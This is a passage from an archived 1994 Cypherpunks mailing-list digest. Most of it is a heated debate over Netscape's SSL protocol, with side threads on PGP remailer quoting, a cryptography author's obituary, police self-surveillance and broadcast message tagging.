can be read off of the internet in the clear providing no measure of privacy at all. I believe the SSL protocol solves this problem. In some future land where IPNG or it's cousin's appear, then maybe SSL will be unnecessary. At the rate that is going, we can use SSL for the next 10 years. Finally, the system is perfectly usable in a proxy environment. If you would like we can send you some brouchures for our products in that area. Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years before the standards process gets around to inventing some old technology and codifying it, we have put something out. We have made the protocol public instead of propreitary and we have asked for critical review. Not griping. Securing documents themselves is a second thing that security software can try to tackle. However, what most people seem to miss is that document security is orthogonal to transport security. We have addressed transport security. Document security can be handled in several ways, including using digital signatures. Because HTTP supports MIME multi-part encoded data using standard RFC-822 headers, it is possible for signed data to be transported today with no change to HTTP whatsoever. Most people out there haven't done this. We will. Today it is already true that documents could be stored mime encoded with digital signatures. All that is needed is a browser that can notice it and put some information up. > > > It is also > > > tied directly to the RSA certification hierarchy. > > I'll point out that X.509 is widely loathed in the internet community > -- its X.509 that caused PEM to fall flat on its face and die. Loathed for what reason? Because it's a standard? You are being two-faced about this thing you know. We chose standards where standards were readily available. X.509 is a perfectly usable way for performing authentication. If you disagree, may I suggest you examine: http://bs.mit.edu:8001/ipra.html > > This is an outright lie. We don't use TIPEM. You could build a > > conformant SSL implementation using RSAREF and the freeware IDEA > > cipher code. As for a barrier to competition. > > RSAREF versions of the code can't be used commercially. RSA won't > license people to do stuff on their own -- unless you have significant > pull, you have to buy TIPEM or BSAFE from them and use THEIR code. You are whining. Provide a free, publicly available public-key algorithm that is not patented, and can be used world wide with exportability from the US. Then we will use it. Until then we are stuck, just like everyone else, in using what is available, not what is imagined. > > So what else is new? We > > all have barriers to overcome before we can compete. Should we get rid of > > TCP/IP as a barrier to using the web? > > Well, TCP/IP is available for free, but thats a horse of a different > color. I don't particularly like your security model, but I don't > object that strenuously to your use of TIPEM qua TIPEM. I do strongly > object to X.509, which is based on technologies entirely alien to the > internet. How do I look up an X.509 certificate in the DNS? Now, given > the Eastlake and Kaufman DNS security system, you can put keys in the > DNS if you use DNS names, but X.509 uses abortive ISO distinguished > names which are utterly unmappable into the DNS. Now this is a good point. This is the kind of space that the internet is heading into. How does authentication work in the larger scheme? We at Netscape have tackled a small piece of the problem space. But the larger picture remains unsolved. Discussions about how to do this are welcome. Using DNS style technology sounds like a good place to start. > As for your "peer review", I'll note that it was done extensively by > RSADSI folks, who aren't entirely unbiased about technologies... Last I checked Mike Burrows and Martin Abadi worked for DEC at SRC in Palo Alto. They were the primary reviewers and contributed greatly to the revisions noted at the front of the document. ----- It would be much more satisfying to be having a technical discussion of SSL's merits or flaws. In addtion, discussing how to solve the "DNS" problem would be profitable for all. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From andrew at riskdev.ml.com Mon Dec 12 14:03:44 1994 From: andrew at riskdev.ml.com (Andrew Brown) Date: Mon, 12 Dec 94 14:03:44 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412122147.AA17081@hodge-podge.MIT.EDU> Message-ID: <9412122203.AA05754@nottingham.riskdev.ml.com> >> From: Derek Atkins >> >> pgp is putting those extra "- " pieces in (guess you didn't read all >> your pgp docs :-), it does that so that it can tell the difference between >> pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines >> beginning with a dot with an extra dot. the difference here is that >> sendmail removes any leading dots before delivery and pgp doesn't after >> removing a signature. yeah, you do have to load it into an editor but >> mailing something to a remailer shoud not "hork" it. the pgp running on >> the remailer will just "- " the stuff and include it literally. > >Uhh, this is not at all true. When PGP verifies a message, it will >strip out the quoting dashes in the output. This is documented in RFC >822 (I think) about quoting messages. > >Just run the message through PGP and it will strip out the first level >of quoting in the output message, and you should be able to then run >PGP on the rest of the message as well. > but is a remailer (or pgp) smart enough to take the output from checking a signature and run pgp over it again? is it going to know to take something and pass it through pgp until pgp can't do anything with it any more? i think that's the problem that jrochkin was addressing. he has a pgp encrypted message and then signs it and then wants to mail it to a remailer so that the remailer can decrypt the message but it won't ecause the encryption is nested... wasn't that it? -- --< "CYBERBOY" >-- andrew at ml.com (Andrew Brown) Phone: 1.212.449.0088 Fax: 1.212.449.8612 $400 million in gold bullion counter-intelligence FBI colonel Kennedy Treasury Honduras jihad Rule Psix Legion of Doom terrorist Khaddafi Uzi South Africa Peking From hfinney at shell.portal.com Mon Dec 12 14:19:48 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 14:19:48 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121231.ZM17395@warp.mcom.com> Message-ID: <199412122219.OAA03950@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Kipp E.B. Hickman" writes: >In article <9412111620.AA41983 at eldamar.walker.org>, [Amanda Walker] writes: >> It is also >> tied directly to the RSA certification hierarchy. Now, for those of us >> who have X.509 certificates rooted in the RSA Commercial Certification >> authority, that's fine, but it also means that any other WWW client that >> wishes to interoperate with Netscape's "secure servers" must license >> TIPEM from RSA Data Security, and consequently pay RSA's rather high >> royalties, unless the software is free (in which case RSAREF can be >used). >> This serves as a direct barrier to competition from other commercial >> vendors. This is not all bad--I happen to like RSADSI's products and >> technology--but promoting a transport-level security system instead of >> an end-to-end one is to my mind simply irresponsible. >This is an outright lie. We don't use TIPEM. You could build a >conformant SSL implementation using RSAREF and the freeware IDEA >cipher code. What about the certification aspect? Would servers be forced to pay for an RSA key certification? This was a point I raised in my comments on SSL. PEM's reliance on the RSA-based certification hierarchy has at least slowed its progress if not doomed it altogether. I understand that Netscape clients will embed certain Certification Authority keys and use them to validate signed server keys. Does this also mean that only RSA-approved CA's will be allowed? What if some CA in some other country not covered by RSA patents came into operation? Would your relationships with RSA still allow you to embed non-RSA- approved CA keys? I would hope so. RSA is both respected and mistrusted in the crypto community, so you wouldn't want to tie yourselves too closely to them. Have you heard of the "web of trust" concept implemented by PGP? This allows users to designate chosen individuals as trusted key signers and to authenticate keys on that basis. It is non-hierarchical and decentralized. (There is also plenty of bad blood between RSA and PGP.) Will you be able to support decentralized authentication models like this? I hope this is something you will explore. (I have no financial interests in any of these companies or protocols!) Hal Finney -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuzMQRnMLJtOy9MBAQEoyQH8CvFo2PzdB7fzn5TDSW52mZFpuu2HIt9d YazndhCPcE349CxumMzwmrE9tVA9e/toEIysfSwcjubW1rOXX7Wrxw== =189c -----END PGP SIGNATURE----- From hfinney at shell.portal.com Mon Dec 12 14:30:12 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 14:30:12 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122118.AA11047@snark.imsi.com> Message-ID: <199412122229.OAA05451@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Perry E. Metzger" writes: >HTTP, like SMTP, is only a transport for underlying documents. The >underlying documents are the things people wish to secure, not the >transport layer. By securing only the transport, you make it possible >for people to get pages that are forged, although they can be sure of >what machine delivered them (which isn't significant). Your system is, >for instance, useless in a proxy HTTP daemon environment. I was going to say that an SSL-aware proxy daemon could play "man in the middle" and pass through the SSL handshaking messages which occur at connection time, so that the user client could authenticate the remote server, then communicate using a key shared with that server but which the proxy would not know. But that won't work with SSL, I guess. The SSL handshaking goes on before any message data has been exchanged; in particular, before the URL is sent to the proxy to tell it what server to connect to. (Hiding URL's is one of the features of SSL.) So in fact with SSL the only authentication possible is between proxy and user, and then between proxy and remote server. There doesn't seem to be a place in the protocol where the user could authenticate the remote server and create a key which would not be known to the proxy. This does seem to be a deficiency. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuzO1hnMLJtOy9MBAQG+IgIAyZvvTpXB6dmCbEyrvLA65QeK4c5T8UNi NAelFrZMEsb/NdS2l8ApczkljEnviCpOiV9W5ALYTKXr9nzJbSaZbg== =eBkX -----END PGP SIGNATURE----- From prz at acm.org Mon Dec 12 14:33:23 1994 From: prz at acm.org (Philip Zimmermann) Date: Mon, 12 Dec 94 14:33:23 PST Subject: Herbert S. Zim dies Message-ID: Herbert S. Zim, author of over 100 children's books, including "Codes and Secret Writing", died at age 85 on December 5th in Plantation Key, Florida, where he has lived for many years. He had Alzheimer's disease. I mention his passing because he wrote the first book I ever read on cryptography, which I read in 4th grade in 1964. If it weren't for Zim, I might not have created PGP. -Philip Zimmermann From perry at imsi.com Mon Dec 12 14:43:55 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 14:43:55 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121357.ZM17505@warp.mcom.com> Message-ID: <9412122242.AA11210@snark.imsi.com> "Kipp E.B. Hickman" says: > First of all, lets start with "not wanting to secure the transport > layer". Right now email, passwords, etc. can be read off of the > internet in the clear providing no measure of privacy at all. I > believe the SSL protocol solves this problem. First of all, Mr. Hickman, you might notice that I said that encryption is needed for privacy. However, transport layer security is far from sufficient for the web because it DOES NOT SECURE THE DOCUMENTS. The fact that you mention email and SSL in the same paragraph demonstrates an ignorance of this topic. Because email is store and forward transport layer encryption mechanisms are worthless -- they only say that no one could read the last hop and in no way do they secure the documents themselves. Thats why PEM was developed. There is now a merger of PEM and MIME that is soon going to be a proposed internet standard following the last IETF meeting. Indeed, Mr Hickman, had you and your friends at Netscape been paying attention instead of rolling your own, you might have noticed that IPSP prototypes are around TODAY and that transport layer mechanisms are going to become rapidly obsolete for securing the communications themselves. You can find a version of swIPe, which is not quite IPSP but is fairly similar (and which is being hacked on so that it will conform) on ftp.csua.berkeley.edu; its even modloadable on Suns. Thats available TODAY. > In some future land where IPNG or it's cousin's appear, then maybe > SSL will be unnecessary. Even were transport layer security needed, there are many other protocols for doing the exact same thing -- your solution is hardly new or interesting. Why not use an existing one instead of rolling Yet Another One? Of course, as I've repeatedly mentioned, network layer security is being used by many people today and will be standardised very soon -- probably before SSL. > Finally, the system is perfectly usable in a proxy environment. Sheer ignorance. In your system I must trust each and every hop between myself and the document, and I must also trust all the servers. With public key signatures on the documents themselves, as Amanda Walker mentioned, you then need trust nothing at all in order to know that documents are authentic. > Secondly, SSL is not an end, but a beginning. Instead of waiting 10 > more years before the standards process gets around to inventing > some old technology and codifying it, we have put something out. I'm afraid that your technology is the old one, and as for "putting something out", as I mentioned network layer solutions are available for ftp TODAY. In source form. Immediately. Oh, and by the way, they don't incorporate such useless abortions as 40 bit RC4 keys. > We have made the protocol public instead of propreitary IPSP is also public. So what? > > > > It is also > > > > tied directly to the RSA certification hierarchy. > > > > I'll point out that X.509 is widely loathed in the internet community > > -- its X.509 that caused PEM to fall flat on its face and die. > > Loathed for what reason? Because it's a standard? We also loathe CLNP. Do you propose to do all your network layer communications over CLNP because it, too, is an ISO standard? ISO standards are universally loathed in the internet community -- and for good reasons. Lets take X.509 as one example. X.509 is tied into X.500 distinguished names. They are 1) Bulky 2) Do not map into DNS names 3) Cannot be mapped into the DNS. 4) Do not support the web of trust model. 5) Are difficult to build parsers for 6) Require bulky and often expensive X.500 directory systems to use effectively. > You are whining. No, I am correct. You are ignorant of the community you are working with. > > Well, TCP/IP is available for free, but thats a horse of a different > > color. I don't particularly like your security model, but I don't > > object that strenuously to your use of TIPEM qua TIPEM. I do strongly > > object to X.509, which is based on technologies entirely alien to the > > internet. How do I look up an X.509 certificate in the DNS? Now, given > > the Eastlake and Kaufman DNS security system, you can put keys in the > > DNS if you use DNS names, but X.509 uses abortive ISO distinguished > > names which are utterly unmappable into the DNS. > > Now this is a good point. This is the kind of space that the > internet is heading into. How does authentication work in the larger > scheme? We at Netscape have tackled a small piece of the problem > space. But the larger picture remains unsolved. I'm afraid the larger picture has been solved -- you just haven't been the ones solving it and you haven't been paying attention to the other people doing work in this area. > Discussions about how to do this are welcome. Using DNS style > technology sounds like a good place to start. Perhaps if you guys had bothered to attend some of the security area meetings at an IETF or two and read up on existing art you would have already known about this topic. > In addtion, discussing how to solve the "DNS" problem would be > profitable for all. The solution is easy -- don't use X.509 certificates. Perry From warlord at MIT.EDU Mon Dec 12 14:46:36 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 12 Dec 94 14:46:36 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412122203.AA05754@nottingham.riskdev.ml.com> Message-ID: <9412122245.AA17251@hodge-podge.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: andrew at riskdev.ml.com (Andrew Brown) cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com Subject: Re: extra dashes in PGP-related blocks? > but is a remailer (or pgp) smart enough to take the output from checking > a signature and run pgp over it again? is it going to know to take something > and pass it through pgp until pgp can't do anything with it any more? i think > that's the problem that jrochkin was addressing. he has a pgp encrypted > message and then signs it and then wants to mail it to a remailer so that the > remailer can decrypt the message but it won't ecause the encryption is > nested... Why would it have to? A plain remailer takes the input you give it, and replays it to the output. It doesn't modify the message in any way, so there is no problem. A remailer that signs a message should take what you send it (no matter _HOW_ you sent it), sign that message wholesale, and then send out the signed message. This means that if you send it a PGP-signed message, the output message will have two signatures -- the outer signature being the signing remailer, and the inner signature (which is quoted by PGP at the remailer) is the signature on the original message. This is the correct behavior, and _SHOULD NOT_ be changed. An anonymizing remailer _might_ want to take the output of a PGP message and pass that into the output, but that is a different function altogether. I dont understand why a plain remailer should have to know anything about PGP if it is just doing remailing, and in any case it should never have to verify a PGP-signed message, unless that is the purpose of the remailer. And even if that IS the case, it should only unwrap the OUTERMOST wrapping from PGP -- it *SHOULD NOT* recursively try to collapse the PGP armors. That is NOT a remailer's job. - -derek -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLuzSYzh0K1zBsGrxAQGR3gLDBxPn9cmWWvWwyRdlcYUlRs5LqMHjMkRa lmOggyb2QmFS1+vEqJ2a1oUxdLJHzNcH4JxjBplDKASmG19Ixvkt1nIjkwGi3yzN J02drrVGYJqs426qnQhxI8E= =B6In -----END PGP SIGNATURE----- From tcmay at netcom.com Mon Dec 12 14:53:55 1994 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 12 Dec 94 14:53:55 PST Subject: Real-time surveillance of the police In-Reply-To: Message-ID: <199412122252.OAA05139@netcom19.netcom.com> Topics I'll discuss: surveillance tapes of cops, localizer bandwidth needs, and digital timestamping. There's _some_ Cypherpunks relevance here, as this thread deals with the issue of surveillance, self-surveillance, escrowed records, etc. I have another point of view to add: I don't want to see my local cops have all of their actions videotaped and reviewed for quite another reason--I don't want a "mechanization" of the enforcement process! Cops, for all of their faults, also have some positive personal characteristics: they use discretion in enforcing laws, they let folks off with warnings or shrugs, etc. I shudder to think about a world in which the hideously complicated legal code is enforced by cops who have video cameras mounted behind them to verify that they never gave a sucker^H^H^Hcitizen-unit a break. (I am slightly reluctant to tell Sandy I have some good opinions of the California Highway Patrol, but I do. I elected to take a one day class to get a speeding ticket taken off my record, and the class was taught by an extremely able, pragmatic retired CHP officer. He had all kinds of tips about driving, accidents, etc., having seen 500 or more fatalities in his 25+ years with the CHP. He also talked about the local judgment, or discretion, that CHP officers have to have. For example, to raise tax revenues, California ruled that "fix-it tickets" (no fee, no fine, just present evidence that a minor automobile flaw has been corrected) would no longer be allowed, that even the most minor infractions--broken tail-light, cracked windshield, etc.--would have to go through the legal process, with special soak-the-driver "administrative" (really, revenue enhancement) fees. So the CHP is simply not playing along, and they've found a way to avoid the process by issuing a different kind of ticket that is in fact a fix-it ticket. He also gave other examples that left me with a more favorable impression of cops....perhaps this was his intent?) (The longer-than-I'd-planned section above is meant to show that even a cop-disliking skeptic like me can be convinced that some good is done is by them, and that not all cops are bad. Perhaps my on-day exposure co-opted me the way certain folks in D.C. got co-opted?) Anyway, I don't _want_ a mechanistic enforcement of *all* laws, with a video camera second-guessing the cop. I don't want 43,761 laws being enforced religiously. (If we had just the 13 or 14 laws I think we need, strict enforcement would be a good thing, but not when the 43,748 extra laws are cluttering up the books.) "Officer, the video records of 1994-12-12 14:22:31 PST indicate your patrol unit was within visual range of a 324.986.666 ("Bicycle Helmet of Improper Color") and yet you ignored this misdemeanor. This being your 3rd such oversight this month, you are being reassigned to the Discipline Platoon at Camp Pendleton. Dismissed." Forcing the cops to surveill themselves will almost certainly take away what enforcement discretion they now have. Sandy Sandfort wrote: (quoting someone else) > ObCrypto/Privacy: I suspect there would be an immense > amount of radio traffic involved in keeping track of a > substantial group of people ... [I doubt] the ability of > the receivers to digest it all in real time. > > (1) My suggestion was for (probably local) recording, not real > time monitoring of video; therefore, no bandwidth problems. > > (2) Tim might want to comment, but my understanding of the > localizer technology is that it too is somewhat "local" and that > polling or burst transmission keeps the bandwidth requirements at > manageable levels. On this bandwidth point, it is certainly true that N localizers/transceivers communicating at M bits per second with some maximum carrier frequency can "overload" the "free space channel." (Crudely, when N x M > .5 B, where B is the "bandwidth" of the communications channel.) For example, a million people each trying to communicate a thousand bits per second would imply an aggregate of a billion bits pers second, barely possible if the carrier frequency maxes out at a few gigahertz. This is Shannon's Theorem, of course. And this is within "one space," nearby. In the real world, with a few miles as the effective range, the "crowding" is not severe. (I'm ignoring other users, radio and t.v., cellular, RF noise, etc. Important things to consider in a more detailed calculation.) Ten thousand such units, in a space a few miles square, each "trying" to communicate 1000 bits per second, would result in only about 10^7 bits per second, aggregate. This is far, far below any Shannon limits (of course, there are other users of the spectrum who may "step on" the users here...these are all tradeoffs to consider, and that _have_ been considered). Fortunately, localization doesn't typically need 1000 bits per second, in any case. (A skier lost in the mountains, a child who has wandered away....all are cases where the needed bits per second is _much_ less than 1000 bps. Indeed, most of the localizers are either not sending info at all, or very sporadically.) Finally, the problems of "proving" the surveillance or audio/video records are not later changed by cops or others is easily solved--by something of great crypto relevance. Namely, digital time-stamping, a la Haber and Stornetta. No "trusted third party storage" is needed: just hash the surveillance records a la Haber and Stornetta and the resulting published hash cannot at a later time be forged. (I devoted much space to this in the FAQ, so grep it for this if interested.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From db at Tadpole.COM Mon Dec 12 15:05:34 1994 From: db at Tadpole.COM (Doug Barnes) Date: Mon, 12 Dec 94 15:05:34 PST Subject: Broadcasts - addressing In-Reply-To: <199412122127.QAA21293@bwnmr5.bwh.harvard.edu> Message-ID: <9412122304.AA10973@tadpole.tadpole.com> > > | > | I have been contemplating how to mark broadcast messages as being > | 'for' someone. To foil traffic analysis, you don't want to include > | their nym or key-id, for the sake of the your poor CPU, you want to > | avoid the need to attempt decryption on everything that passes through. > > Keys are cheap. Everyone should have a bunch. To foil > TA, hand out a key to each correspondant. Give them id's like > 'latex.limb.malaise ' > Yes, but any set of messages sent under a particular key are linked for purposes of traffic analysis. You would need to hand out (potentially) a key per message, or stacks of keys. At which point, you're doing something very similar to what I suggested. I personally think that it would be easier to manage fewer keys and use something very simple (like a large random number) for message tagging, but this is just me. Doug From kipp at warp.mcom.com Mon Dec 12 15:10:47 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 15:10:47 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122242.AA11210@snark.imsi.com> Message-ID: <9412121508.ZM17611@warp.mcom.com> On Dec 12, 5:42pm, Perry E. Metzger wrote: > Subject: Re: Clarification of my remarks about Netscape > > "Kipp E.B. Hickman" says: > > First of all, lets start with "not wanting to secure the transport > > layer". Right now email, passwords, etc. can be read off of the > > internet in the clear providing no measure of privacy at all. I > > believe the SSL protocol solves this problem. > > First of all, Mr. Hickman, you might notice that I said that > encryption is needed for privacy. However, transport layer security is > far from sufficient for the web because it DOES NOT SECURE THE > DOCUMENTS. The fact that you mention email and SSL in the same > paragraph demonstrates an ignorance of this topic. Because email is > store and forward transport layer encryption mechanisms are worthless > -- they only say that no one could read the last hop and in no way do > they secure the documents themselves. Thats why PEM was > developed. There is now a merger of PEM and MIME that is soon going to > be a proposed internet standard following the last IETF meeting. Clearly you and I disagree on a fundamental point. Which is more important? Securing the document or securing the transport of the document. I believe that today's problem for commerce is securing the transport. Solving this currently widespread problem makes the Internet a friendlier place for commerce. It allows sensitive information to be transported privately. Protecting against forgery is the next logical step. > Indeed, Mr Hickman, had you and your friends at Netscape been paying > attention instead of rolling your own, you might have noticed that > IPSP prototypes are around TODAY and that transport layer mechanisms > are going to become rapidly obsolete for securing the communications > themselves. You can find a version of swIPe, which is not quite IPSP > but is fairly similar (and which is being hacked on so that it will > conform) on ftp.csua.berkeley.edu; its even modloadable on Suns. Thats > available TODAY. Let's pretend for a moment that you are right. IPSP is the way to go, today, and that silly us, we should have used it. So now I go to my site manager, and say: Please replace all that fancy expensive network hardware with new ones that speak IPSP so that we can do private communications with... So who can I talk to? Name one router that speaks the secure protocols you are documenting? Name one PPP based bridge that does? Show me, today, what percentage of the Internet is covered by these standards? Give me some growth curves showing how the Internet will quickly be converted to a secure network? My point is not that IPSP is "bad". My point is that *today* it is irrelevant. Tommorow is another matter. In the future, I hope that you are right, IPSP is everywhere and we can all breath a sigh of relief. In this case SSL is of little value. However, in the mean time we have what we have. My company's network hardware is typical. It is filled with expensive devices that don't understand IPSP or IPNG. In fact, most of the world is constructed this way. What you are implicitly asking for is for the world to replace its networking hardware/software solutions before allowing privacy. I think that this is a incorrect. SSL is a temporary solution to a nagging problem. It's design was predicated on the belief that the future is in protocols such as IPSP. Security will be pushed lower and lower until it is omnipresent. > > In some future land where IPNG or it's cousin's appear, then maybe > > SSL will be unnecessary. > > Even were transport layer security needed, there are many other > protocols for doing the exact same thing -- your solution is hardly > new or interesting. Why not use an existing one instead of rolling Yet > Another One? Of course, as I've repeatedly mentioned, network layer > security is being used by many people today and will be standardised > very soon -- probably before SSL. We never claimed the solution was new or interesting. However, it is a solution. > > Finally, the system is perfectly usable in a proxy environment. > > Sheer ignorance. In your system I must trust each and every hop > between myself and the document, and I must also trust all the > servers. With public key signatures on the documents themselves, as > Amanda Walker mentioned, you then need trust nothing at all in order > to know that documents are authentic. You are making the assumption that the proxy is able to understand the secure conversations between a client and its eventual server. This need not be true and should not be true. > > Secondly, SSL is not an end, but a beginning. Instead of waiting 10 > > more years before the standards process gets around to inventing > > some old technology and codifying it, we have put something out. > > I'm afraid that your technology is the old one, and as for "putting > something out", as I mentioned network layer solutions are available > for ftp TODAY. In source form. Immediately. Oh, and by the way, they > don't incorporate such useless abortions as 40 bit RC4 keys. You must have missed a line in the spec: #define SSL_CK_RC4_WITH_MD5 0x01 #define SSL_CK_RC4_EXPORT40_WITH_MD5 0x02 #define SSL_CK_RC2_CBC_WITH_MD5 0x03 #define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04 #define SSL_CK_IDEA_CBC_WITH_MD5 0x05 Note the inclusion of plain RC4 (not 40 bit), plain RC2 (not 40 bit) and plain IDEA (again, not 40 bit). If you have an exportable solution that can be manufactured in the US and then shipped overseas, then that is something of value. Complaining about 40 bit keys is not of value. The ITAR rules are what they are and at this point in time we can't change them. > > We have made the protocol public instead of propreitary > > IPSP is also public. So what? > > > > > > It is also > > > > > tied directly to the RSA certification hierarchy. > > > > > > I'll point out that X.509 is widely loathed in the internet community > > > -- its X.509 that caused PEM to fall flat on its face and die. > > > > Loathed for what reason? Because it's a standard? > > We also loathe CLNP. Do you propose to do all your network layer > communications over CLNP because it, too, is an ISO standard? ISO > standards are universally loathed in the internet community -- and for > good reasons. Lets take X.509 as one example. > > X.509 is tied into X.500 distinguished names. They are > > 1) Bulky > 2) Do not map into DNS names > 3) Cannot be mapped into the DNS. > 4) Do not support the web of trust model. > 5) Are difficult to build parsers for > 6) Require bulky and often expensive X.500 directory systems to use > effectively. Not true. Distinguished names can be bulky, but you don't have to use them that way. They can be made to map into DNS names trivially, and because you don't have to have a single root, a web of trust is perfectly possible. Examine how PGP self signed public keys are managed. Finally, "bulky and often expensive" is a matter of opinion. Please define a solution that is: distributed reliable supports an unforgeable name to public-key mapping standard not-bulky not-expensive I will be the first to sign up and buy one. The market exists. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From amanda at intercon.com Mon Dec 12 15:14:18 1994 From: amanda at intercon.com (Amanda Walker) Date: Mon, 12 Dec 94 15:14:18 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412121811.AA55359@amanda.dial.intercon.com> [I'm sending this to the list because it does have some crypto content] "Kipp E.B. Hickman" writes: > > There is no need to bypass existing efforts just to add cosmetic value to > > your own software. > This has nothing to do with security... Agreed. My annoyance with Netscape is not based solely, or even primarily, on security concerns. In fact, my only annoyance with your security proposal is that it is at the wrong layer (or, more accurately, at layer which should be secondary). In my view, you picked the right technology, but applied it to the wrong problem :). > Clearly I'm an idiot. Explain it to me. SSL is a mechanism whereby a client and a server can establish a secure, authenticated transport channel. The problem is that this isn't what I want to secure and authenticate. Most of the time, in fact, I don't care about the transport: I may be talking through a proxy (like the current CERN httpd), or bringing things in from a cache, or talking to a load-balanced server array. I want the *documents* I'm accessing to be secure and/or authenticated. I want my HTML documents signed and certified by the *author*, not the server. I couldn't care less about the server if I can verify that I've got the right document in response to my query. Similarly, if I send the contents of a form containing, say, my Amex number, I want to encrypt the session key with the public key of the merchant, not the service provider. This is what I (and many others) mean by an "end to end security model." Transport security is a nice secondary ability (it helps defend against traffic analysis, for example, and casual snooping by students with packet sniffers), but without end-to-end security, it's simply a way of providing a false sense of security. I wouldn't want to do away with the TCP checksum field simply because the modem I use for my SLIP link is "error-correcting," and I feel the same way about security. > I put my email address in there for that very reason. Jeesh. I'd rather that technical feedback occur in a public forum like the IETF. I have no pretensions about being a security expert, and I want people to shoot down my bad ideas too. Heck, I *like* having my competitors tell me what's wrong with my ideas :). > > This serves as a direct barrier to competition from other commercial > > vendors. > This is an outright lie. We don't use TIPEM. You could build a > conformant SSL implementation using RSAREF and the freeware IDEA > cipher code. Nope, not if I want to sell it (note the word "commercial" in my comment). RSAREF cannot be used for commercial software, nor can IDEA under the PGP license. There is no feasible way to license the RSA patents for commercial use except by licensing TIPEM. I have been told this outright by Kurt Stammberger of RSADSI (their VP of marketing, I believe). This is not secondhand information. All commercial software that I know of using RSA public key encryption and RSA stream ciphers (such as RC2 and RC4) uses TIPEM and BSAFE, including Lotus Notes and Apple PowerTalk. RSA's royalty structure is based on a percentage of revenue, with the percentage on a sliding scale based on gross corporate revenue (not just on products which use RSA's patents). If you keep your margins low to compete in the marketplace, you lose. Even you folks are making your money on high-margin products (servers) rather than low-margin ones (clients), I'd wager at least in part because it's a way to make money despite having to pay RSA royalties. The RSAREF license has been loosened up some recently, but it's still restricted to freeware. > As for a barrier to competition. So what else is new? We > all have barriers to overcome before we can compete. Should we get rid of > TCP/IP as a barrier to using the web? I don't have to pay royalties to sell an implementation of TCP/IP. Your analogy fails. > You are somewhat right here. In fact, this was done because we are a company > interested in surviving long enough to withstand the eventual attack > by microsoft. You've already got your eggs in the right basket on this one--sell servers and services, not client software. Microsoft has a miserable track record in the server arena (witness the underwhelming success of Windows NT :)). It's also less of a commodity market, which is where Microsoft excels (no pun intended). > As a result we received critical review > from some decent members of the crypto community, including: > > Martin Abadi > Mike Burrows > Alan Schiffman > Matt Robshaw > Burt Kaliski Mostly RSADSI people, by my count. Great technical background, but I wouldn't call relying on one of your technology vendors "peer review"... > As for the IETF standards process, we are pushing the > document into the RFC process. Precisely. Rather than working with others in the industry and research communities, you are trying to push your proposal into the standards track. > The market will decide one way or the other. On this I agree completely. Amanda Walker From perry at imsi.com Mon Dec 12 15:23:47 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 15:23:47 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121508.ZM17611@warp.mcom.com> Message-ID: <9412122322.AA11307@snark.imsi.com> "Kipp E.B. Hickman" says: > Clearly you and I disagree on a fundamental point. Which is more > important? Securing the document or securing the transport of the > document. I believe that today's problem for commerce is securing > the transport. I believe there is a fundamental problem of understanding here -- it does not seem that you understand how store and forward email works. Securing just the transport is less than useless. > Solving this currently widespread problem makes the > Internet a friendlier place for commerce. It allows sensitive > information to be transported privately. No, it does not -- it just means that some links can't be read. On the other hand, PEM/MIME-PEM *ALREADY* keep people from reading no matter whether the link is open or not open. > Let's pretend for a moment that you are right. IPSP is the way to > go, today, and that silly us, we should have used it. So now I go to > my site manager, and say: > > Please replace all that fancy expensive network hardware with new > ones that speak IPSP so that we can do private communications with... You don't have to replace any hardware. More ignorance on your part. > So who can I talk to? Name one router that speaks the secure > protocols you are documenting? Each and every one routes it today. I have routed swIPe packets over the commercial internet -- and of course I couldn't control any of the intervening routers. Your comments indicate that you are totally unaware of how IPSP is designed to work. You are ignorant and foolish. You could at least read a document or two before making statements that make you sound stupid. I read your documents. You could at least read other peoples -- but that would naturally require that you even realize that other people have done work on this topic. > > Even were transport layer security needed, there are many other > > protocols for doing the exact same thing -- your solution is hardly > > new or interesting. Why not use an existing one instead of rolling Yet > > Another One? Of course, as I've repeatedly mentioned, network layer > > security is being used by many people today and will be standardised > > very soon -- probably before SSL. > > We never claimed the solution was new or interesting. However, it is a > solution. Yet Another Solution. Why not invent your own internet protocol? After all, it would be a "solution". > You must have missed a line in the spec: > > #define SSL_CK_RC4_WITH_MD5 0x01 > #define SSL_CK_RC4_EXPORT40_WITH_MD5 0x02 > #define SSL_CK_RC2_CBC_WITH_MD5 0x03 > #define SSL_CK_RC2_CBC_EXPORT40_WITH_MD5 0x04 > #define 